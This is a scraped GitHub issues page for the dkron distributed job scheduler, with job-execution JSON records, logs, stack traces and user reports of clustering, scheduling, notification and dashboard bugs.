    "output": "IDEwOjA0OjIwIHVwIDEzNyBkYXlzLCAyMDo0MywgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDEsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450688660000278399,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:20.080449838+01:00",
    "finished_at": "2015-12-21T10:04:20.083152242+01:00",
    "success": true,
    "output": "IDEwOjA0OjIwIHVwIDM4MiBkYXlzLCAxOTowOCwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMTQsIDAuMTksIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450688660000278399,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:30.001022246+01:00",
    "finished_at": "2015-12-21T10:04:30.006653609+01:00",
    "success": true,
    "output": "IDEwOjA0OjMwIHVwIDQ3MSBkYXlzLCAyMzo1OSwgIDUgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDEuMDMsIDAuOTIsIDAuNzcK",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450688670000398125,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:30.079775433+01:00",
    "finished_at": "2015-12-21T10:04:30.082153846+01:00",
    "success": true,
    "output": "IDEwOjA0OjMwIHVwIDEzNyBkYXlzLCAyMDo0MywgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDEsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450688670000398125,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:30.080502914+01:00",
    "finished_at": "2015-12-21T10:04:30.08370006+01:00",
    "success": true,
    "output": "IDEwOjA0OjMwIHVwIDM4MiBkYXlzLCAxOTowOCwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMTIsIDAuMTgsIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450688670000398125,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

            {
                "role": "nrh_dkron_server"
            }
        }
    }

]

Conditional logic to re-run failed jobs N times before sending an alert/logging a failure

Same job executed in parallel on all nondes

I faced a problem with job execution and would like to clarify if it's a bug or a feature.

Set up:

After checkout master and glide install:

$ docker-compose up
Creating dkron_etcd_1
Creating dkron_dkron_seed_1
Creating dkron_dkron_1
Attaching to dkron_etcd_1, dkron_dkron_seed_1, dkron_dkron_1
etcd_1       | [etcd] Mar  4 09:45:41.441 WARNING   | Using the directory dcron1.etcd as the etcd curation directory because a directory was not specified.
etcd_1       | [etcd] Mar  4 09:45:41.443 INFO      | dcron1 is starting a new cluster
etcd_1       | [etcd] Mar  4 09:45:41.447 INFO      | etcd server [name dcron1, listen on :4001, advertised url http://127.0.0.1:4001]
etcd_1       | [etcd] Mar  4 09:45:41.447 INFO      | peer server [name dcron1, listen on :7001, advertised url http://127.0.0.1:7001]
etcd_1       | [etcd] Mar  4 09:45:41.448 INFO      | dcron1 starting in peer mode
etcd_1       | [etcd] Mar  4 09:45:41.448 INFO      | dcron1: state changed from 'initialized' to 'follower'.
etcd_1       | [etcd] Mar  4 09:45:41.448 INFO      | dcron1: state changed from 'follower' to 'leader'.
etcd_1       | [etcd] Mar  4 09:45:41.448 INFO      | dcron1: leader changed from '' to 'dcron1'.
dkron_seed_1 | Starting Dkron agent...
dkron_seed_1 | time="2016-03-04T09:46:17Z" level=info msg="agent: Dkron agent starting"
dkron_seed_1 | time="2016-03-04T09:46:17Z" level=info msg="agent: joining: [dkron:8946] replay: true"
dkron_seed_1 | time="2016-03-04T09:46:18Z" level=warning msg="agent: error joining: lookup dkron on 8.8.8.8:53: no such host"
dkron_seed_1 | time="2016-03-04T09:46:18Z" level=info msg="api: Running HTTP server" address=":8080"
dkron_seed_1 | time="2016-03-04T09:46:18Z" level=info msg="agent: Successfully set leader" key=492e1f77c19a463f90433df6044fdadf675f750e
dkron_seed_1 | time="2016-03-04T09:46:18Z" level=info msg="agent: Listen for events"
dkron_1      | Starting Dkron agent...
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: Dkron agent starting"
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: joining: [dkron_seed:8946] replay: true"
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: joined: 1 nodes"
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="api: Running HTTP server" address=":8080"
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: The current leader is active" key=492e1f77c19a463f90433df6044fdadf675f750e
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: Listen for events"

Action:

Then I've published a new job, to run date every 10 seconds:

$ curl -n -XPOST 192.168.99.100:32780/v1/jobs  -H "Content-Type: application/json"    -d '{
  "name": "cron_job",
  "schedule": "*/10 * * * * *",
  "command": "/bin/date"
}'
{"name":"cron_job","schedule":"*/10 * * * * *","command":"/bin/date","owner":"","owner_email":"","run_as_user":"","success_count":0,"error_count":0,"last_success":"0001-01-01T00:00:00Z","last_error":"0001-01-01T00:00:00Z","disabled":false,"tags":null}

Result:

And both nodes have started to trigger job simultaneously:

dkron_seed_1 | time="2016-03-04T09:48:10Z" level=info msg="agent: Starting job" job="cron_job"
dkron_1      | time="2016-03-04T09:48:10Z" level=info msg="agent: Starting job" job="cron_job"
dkron_seed_1 | time="2016-03-04T09:48:20Z" level=info msg="agent: Starting job" job="cron_job"
dkron_1      | time="2016-03-04T09:48:20Z" level=info msg="agent: Starting job" job="cron_job"
dkron_seed_1 | time="2016-03-04T09:48:30Z" level=info msg="agent: Starting job" job="cron_job"
dkron_1      | time="2016-03-04T09:48:30Z" level=info msg="agent: Starting job" job="cron_job"
dkron_seed_1 | time="2016-03-04T09:48:40Z" level=info msg="agent: Starting job" job="cron_job"
dkron_1      | time="2016-03-04T09:48:40Z" level=info msg="agent: Starting job" job="cron_job"

And success counter increased by 2.

Expectation:

Since dkron_seed_1 is a leader, means only this node should trigger job.

I'd assume it's a bug. Cause sending email or trigger recurrent payments by cron must be unique.

Correct me if I'm wrong.
Thank you.

/cc @Victorcoder

Cron runs on both servers in a cluster

Related to #55 and #62. I have two instances that are in a cluster together. /v1/leader lists one of the two, but both run the script.

$ curl 127.0.0.1:8988/v1/leader
{"Name":"ip-10-100-15-123","Addr":"10.100.15.123","Port":8946,"Tags":{"key":"6dba49e7c1cd0e361fd609f05f10b3af789cb6b5","role":"background_processing","server":"true"},"Status":1,"ProtocolMin":1,"ProtocolMax":2,"ProtocolCur":2,"DelegateMin":2,"DelegateMax":4,"DelegateCur":4}

From CRON_JOB in Consul:

{
  "job_name": "cron_job",
  "started_at": "2016-02-18T03:54:00.000793897Z",
  "finished_at": "2016-02-18T03:54:00.003708152Z",
  "success": true,
  "node_name": "ip-10-100-15-123",
  "group": 1455767640000272515,
  "job": {
    "name": "cron_job",
    "schedule": "0 * * * * *",
    "command": "/cron-worker-queue.sh",
    "owner": "Me",
    "owner_email": "[email protected]",
    "run_as_user": "ubuntu",
    "success_count": 58,
    "error_count": 0,
    "last_success": "2016-02-18T03:50:27.827976052Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": {
      "role": "background_processing"
    }
  }
}

{
  "job_name": "cron_job",
  "started_at": "2016-02-18T03:54:00.185756608Z",
  "finished_at": "2016-02-18T03:54:00.190238507Z",
  "success": true,
  "node_name": "ip-10-100-15-187",
  "group": 1455767640000272515,
  "job": {
    "name": "cron_job",
    "schedule": "0 * * * * *",
    "command": "/cron-worker-queue.sh",
    "owner": "Me",
    "owner_email": "[email protected]",
    "run_as_user": "ubuntu",
    "success_count": 58,
    "error_count": 0,
    "last_success": "2016-02-18T03:50:27.827976052Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": {
      "role": "background_processing"
    }
  }
}

Any ideas? Pinging @whizz on this, since it seems like they've dealt with this. Thanks!

Jobs run :05 or :10 after schedule

I'm still in the early stages of investigating this, but I thought I'd open a ticket in case you had some insight.

We're noticing that for most of the time, the jobs run exactly at :00. But once in awhile - particularly if the instance is running at least one other thread - it will run at :05 or :10 after. It's never in between; rather, it's always increments of 5 seconds.

Any idea why this might be, and if there's anything that can be done to alleviate?

(For what it's worth, this is 0.6.3.)

please include linux_arm to builds

Thanks for dkron!

Please add linux_arm to the list of devices you publish releases for. That would be fantastic for me, and Raspberry PI users.

GOOS=linux GOARCH=arm

Dasboard crash

After a while of running, with no immediately apparent reason, the dashboard starts crashing on any request with following log:

2016-02-25_08:08:29.59255 2016/02/25 09:08:29 http: panic serving 10.9.233.79:64571: runtime error: invalid memory address or nil pointer dereference
2016-02-25_08:08:29.59256 goroutine 24472 [running]:
2016-02-25_08:08:29.59256 net/http.(*conn).serve.func1(0xc820222160, 0x7faffff49240, 0xc820118010)
2016-02-25_08:08:29.59257       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1287 +0xb5
2016-02-25_08:08:29.59257 github.com/victorcoder/dkron/dkron.newCommonDashboardData(0xc82010e820, 0xc820162280, 0x16, 0x0, 0x0, 0x0)
2016-02-25_08:08:29.59257       /Users/victorcoder/src/github.com/victorcoder/dkron/dkron/dashboard.go:33 +0x55f
2016-02-25_08:08:29.59258 github.com/victorcoder/dkron/dkron.(*AgentCommand).dashboardIndexHandler(0xc82010e820, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59258       /Users/victorcoder/src/github.com/victorcoder/dkron/dkron/dashboard.go:73 +0x4a7
2016-02-25_08:08:29.59258 github.com/victorcoder/dkron/dkron.(*AgentCommand).(github.com/victorcoder/dkron/dkron.dashboardIndexHandler)-fm(0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59258       /Users/victorcoder/src/github.com/victorcoder/dkron/dkron/dashboard.go:43 +0x3e
2016-02-25_08:08:29.59259 net/http.HandlerFunc.ServeHTTP(0xc820229bb0, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59259       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
2016-02-25_08:08:29.59261 github.com/victorcoder/dkron/vendor/github.com/gorilla/mux.(*Router).ServeHTTP(0xc82010eaf0, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59261       /Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/gorilla/mux/mux.go:98 +0x29e
2016-02-25_08:08:29.59261 github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose.(*Middleware).UseHandler.func1.1(0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59262       /Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose/interpose.go:55 +0x69
2016-02-25_08:08:29.59262 net/http.HandlerFunc.ServeHTTP(0xc820174f90, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59262       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
2016-02-25_08:08:29.59262 github.com/victorcoder/dkron/dkron.metaMiddleware.func1.1(0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59263       /Users/victorcoder/src/github.com/victorcoder/dkron/dkron/api.go:75 +0x1ac
2016-02-25_08:08:29.59263 net/http.HandlerFunc.ServeHTTP(0xc820175080, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59264       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
2016-02-25_08:08:29.59264 github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose.(*Middleware).ServeHTTP(0xc8202365e0, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59264       /Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose/interpose.go:85 +0x6c
2016-02-25_08:08:29.59264 net/http.serverHandler.ServeHTTP(0xc820137c20, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59265       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1862 +0x19e
2016-02-25_08:08:29.59265 net/http.(*conn).serve(0xc820222160)
2016-02-25_08:08:29.59265       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1361 +0xbee
2016-02-25_08:08:29.59265 created by net/http.(*Server).Serve
2016-02-25_08:08:29.59267       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1910 +0x3f6

No documentation on -join option

Hey, I see the -join option used in docker-compose.yaml, but I can't find docs on it. What does this do?

server value from config json is not used

If you specify a "server" option (set to true) in the configuration json, it is ignored. Only command line option works. Not sure if it is a bug or a feature, but the docs state, that all command line options can be set in the config file.

Notifications

First step is to have email notifications.

Second step webhook configuration to send notifications to.

Commandline option -join does not work when used multiple times

When you specify multiple -join values, the agent will not join a cluster, as the value is wrongly interpreted.

# ./dkron agent -node v-5004.local -bind 0.0.0.0:8946 -http-addr :8080 -backend consul -backend-machine v-211.local:8500 -server -keyspace dkron -encrypt kPpdjphiipNSsjd4QHWbkA== -rpc-port 6868 -tag role=test -join 127.0.0.1:5001 -join 127.0.0.1:5002

INFO[0000] No valid config found: Unsupported Config Type ""
 Applying default values.
Starting Dkron agent...
INFO[2015-12-14T13:37:48+01:00] agent: Dkron agent starting
INFO[2015-12-14T13:37:48+01:00] agent: joining: [127.0.0.1:5001,127.0.0.1:5002] replay: true
WARN[2015-12-14T13:37:48+01:00] agent: error joining: too many colons in address 127.0.0.1:5001,127.0.0.1:5002
INFO[2015-12-14T13:37:48+01:00] api: Running HTTP server                      address=:8080
INFO[2015-12-14T13:37:48+01:00] api: Exiting HTTP server
INFO[2015-12-14T13:37:48+01:00] agent: Listen for events

Plugable job types

This is an open discussion on how to implement different job types.

Some use cases won't need or don't benefit from shell execution and specially with lots of jobs.

Node failing to join without reason

Hey, I am just getting everything setup. So I have things working very well on a single host via docker containers. However, when I attempt to expand that out to other hosts, the agent fails to join and gives no reason. My main docker-compose looks like:

dkron-server-luigi:
  container_name: dkron-server-luigi
  hostname: dkron-server-luigi
  links:
    - dkron-agent-luigi
  ports:
    - "8946:8946/udp"
    - "8946:8946"
    - "6868:6868/udp"
    - "6868:6868"
    - "8080:8080"
  build: ./
  volumes:
    - /var/run/docker.sock:/var/run/docker.sock
    - ./config:/opt/local/dkron/config
  command: agent -server -backend=etcd -backend-machine=10.100.4.249:4001 -join=10.100.4.155:8946 -debug=true
dkron-agent-luigi:
  container_name: dkron-agent-luigi
  hostname: dkron-agent-luigi
  ports:
    - "8946"
    - "6868"
  build: ./
  volumes:
    - /var/run/docker.sock:/var/run/docker.sock
    - ./config:/opt/local/dkron/config
  command: agent -debug=true -join=10.100.4.249:8946
etcd:
  image: microbox/etcd
  ports:
    - "4001:4001"
  volumes:
    - ./etcd.data:/data
  command: -name=dcron1

The above setup works great, but my remote agent docker-compose looks like:

dkron-agent-qcb1:
  container_name: dkron-agent-qcb1
  hostname: dkron-agent-qcb1
  ports:
    - "8946:8946"
    - "8946:8946/udp"
    - "6868:6868"
    - "6868:6868/udp"
  build: ./dkron
  volumes:
    - /var/run/docker.sock:/var/run/docker.sock
    - ./dkron/config:/opt/local/dkron/config
  command: agent -debug=true -join=10.100.4.249:8946

both are being build from the docker registry dkron/dkron:latest, and the error message is simply:

dkron-agent-qcb1 | time="2016-04-18T21:14:11Z" level=debug msg="agent: Received event" event=member-join 
dkron-agent-qcb1 | time="2016-04-18T21:14:18Z" level=debug msg="agent: Received event" event=member-failed

my dkron.json looks like:

{
  "tags": {
    "role": "qcb_docker"
  },
  "keyspace": "dcron"
}

which is basically the same on both hosts.

I have played with all the network settings and cannot seem to find anything wrong, all of my ports are open all all protocols for both hosts. When I query the members, the remote host shows up but with a status of 4. Here is the response from that:

[{'Addr': '172.17.0.4',
  'DelegateCur': 4,
  'DelegateMax': 4,
  'DelegateMin': 2,
  'Name': 'dkron-server-luigi',
  'Port': 8946,
  'ProtocolCur': 2,
  'ProtocolMax': 2,
  'ProtocolMin': 1,
  'Status': 1,
  'Tags': {'key': '8f18334d9e26440bff0f3df9ad7fab6994074f8c',
   'role': 'luigi_docker',
   'server': 'true'}},
 {'Addr': '172.17.0.13',
  'DelegateCur': 4,
  'DelegateMax': 4,
  'DelegateMin': 2,
  'Name': 'dkron-agent-qcb1',
  'Port': 8946,
  'ProtocolCur': 2,
  'ProtocolMax': 2,
  'ProtocolMin': 1,
  'Status': 4,
  'Tags': {'role': 'qcb_docker'}},
 {'Addr': '172.17.0.2',
  'DelegateCur': 4,
  'DelegateMax': 4,
  'DelegateMin': 2,
  'Name': 'dkron-agent-luigi',
  'Port': 8946,
  'ProtocolCur': 2,
  'ProtocolMax': 2,
  'ProtocolMin': 1,
  'Status': 1,
  'Tags': {'role': 'luigi_docker'}}]

Does anything catch your eye here?

Security layer

Implement the security layer using the serf key management

Optional pretty formatting of API responses

Allow pretty formatting of API output. Parameter based.

Couple questions

Hey, I'm sorry about directing these here, but not sure where else to go. My team and I are looking at implementing this, we have a couple questions though:

Can you execute commands on remote servers?

When do you all think this will be stable? Are you still seeing bugs in basic executions?

Thanks

No Slack notification at the end of a long job ?

Hi,

I've noticed there's no Slack notification at the end of a long job. No problem for mail notification.
Is there a solution or a reason ?

Thx!

Set a timeout for long running jobs with the ability to have them automatically killed.

Being able to set a time out on jobs
Being able to kill the job if it’s timed out.

List of nodes in dashboard keeps reordering

It's a cosmetic issue. The dashboard homepage (/dashboard) displays a list of nodes at the bottom. It gets live updated. It is probably not sorted though, so it keeps randomly changing the order of the nodes. It's more annoying than anything, so not a huge priority I guess.

Translate node status

Currently the node status in UI node list is shown as a number.

Will be useful for the user to show the status in plain english.

Namespace API

Namespacing API with v1 to allow future changes.

Run job on one node at a time only?

Hello,

I have a special use case that I'm not sure how to get around it:

Every day our store has thousands of invoice to check and and send out, we usually schedule this to run at a specific time of the day. I would love to use dkron to have the advantage of ensuring that the crob job does not rely on a single machine to run, but I also have to ensure that this only runs on 1 single machine (Since we should not send invoices twice). I would love to have the ability to pick the best fit machine at run time (least resource usage for example) then run the cron there but not on any other machine.

Job overwrite

Don't overwrite job stats that doesn't change on job updating

Fix run job from dashboard

The run button stopped working, probably on API versioning.

Webhook alert firing on success

Hey, I just got the web hooks going, and they are working, except they are also firing when a job succeeds.

dkron-server-central | time="2016-04-29T22:22:12Z" level=info msg="agent: Running for election" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:22:12Z" level=info msg="agent: Cluster leadership lost" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:22:12Z" level=debug msg="agent: Stopping scheduler due to lost leadership" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:03Z" level=debug msg="agent: Received event" event="query: rpc:config" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:03Z" level=debug msg="agent: RPC Config requested" at=633 node=aws-nv-p-ops-elk payload= query="rpc:config" 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="rpc: Received execution done" group=1461969000000382365 job=sched node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="store: Retrieved job from datastore" job=sched node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="store: Setting key" execution=1461969000000899257-aws-nv-p-ops-luigi.valkyrie.net job=sched node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="store: Setting job" job=sched json="{\"name\":\"sched\",\"schedule\":\"0 */5 * * *\",\"command\":\"/home/patrick.barker/.pyenv/versions/anaconda3-2.4.1/bin/python /home/patrick.barker/dkron-python/scriptname/sched.py\",\"owner\":\"\",\"owner_email\":\"[email protected]\",\"run_as_user\":\"\",\"success_count\":1,\"error_count\":0,\"last_success\":\"2016-04-29T22:30:03.423389784Z\",\"last_error\":\"0001-01-01T00:00:00Z\",\"disabled\":false,\"tags\":{\"role\":\"luigi_docker\"}}" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="Webhook call response" body= header=map[X-Ratelimit-Limit:[100] Connection:[keep-alive] X-Ratelimit-Remaining:[100] Location:[https://hipchat.datalogix.com/v2/room/262/history/a0b2f4f5-1b51-40d4-b38b-10cf1e89988a] Access-Control-Allow-Origin:[*] X-Ratelimit-Reset:[1461969307] Server:[nginx] Date:[Fri, 29 Apr 2016 22:30:06 GMT] Content-Type:[text/html] X-Robots-Tag:[noindex, nofollow, nosnippet, noarchive] Strict-Transport-Security:[max-age=31536000]] node=aws-nv-p-ops-elk status="204 No Content"

The UI shows that the job was a success. Any ideas what could be happening here? Thanks

Show the keyspace in status bar

In the footer will be informative to show the keyspace configured for this dkron cluster instance.

scheduling mismatch tags with same prefix

I have two servers, one has role of vpnserver and another vpnserver2, after posting a job targeting tags vpnserver, both servers got scheduled.

curl 127.0.0.1:8080/v1/members | python -m json.tool
[
{
"Addr": "10.0.0.9",
"DelegateCur": 4,
"DelegateMax": 4,
"DelegateMin": 2,
"Name": "h1",
"Port": 8946,
"ProtocolCur": 2,
"ProtocolMax": 2,
"ProtocolMin": 1,
"Status": 1,
"Tags": {
"key": "xxx1",
"role": "vpnserver2",
"server": "true"
}
},
{
"Addr": "10.0.0.1",
"DelegateCur": 4,
"DelegateMax": 4,
"DelegateMin": 2,
"Name": "h2",
"Port": 8946,
"ProtocolCur": 2,
"ProtocolMax": 2,
"ProtocolMin": 1,
"Status": 1,
"Tags": {
"key": "xxx2",
"role": "vpnserver",
"server": "true"
}
}
]

curl -n -X POST 127.0.0.1:8080/v1/jobs
-H "Content-Type: application/json"

-d '{
"name": "uptime",
"schedule": "0 30 * * * *",
"command": "uptime",
"tags": {
"role": "vpnserver"
}
}'

Fix execution response when job deleted

When an execution isn't finished and the job is deleted, the executing server receiving the execution result will fail.

distribworks / dkron Goto Github PK

dkron's Introduction

Dkron - Distributed, fault tolerant job scheduling system for cloud native environments

Installation

Development Quick start

Frontend development

Resources

Contributors

Get in touch

dkron's People

Contributors

Stargazers

Watchers

Forkers

dkron's Issues

My setup:

Expected result:

Observed result:

Question

Recommend Projects

Recommend Topics

Recommend Org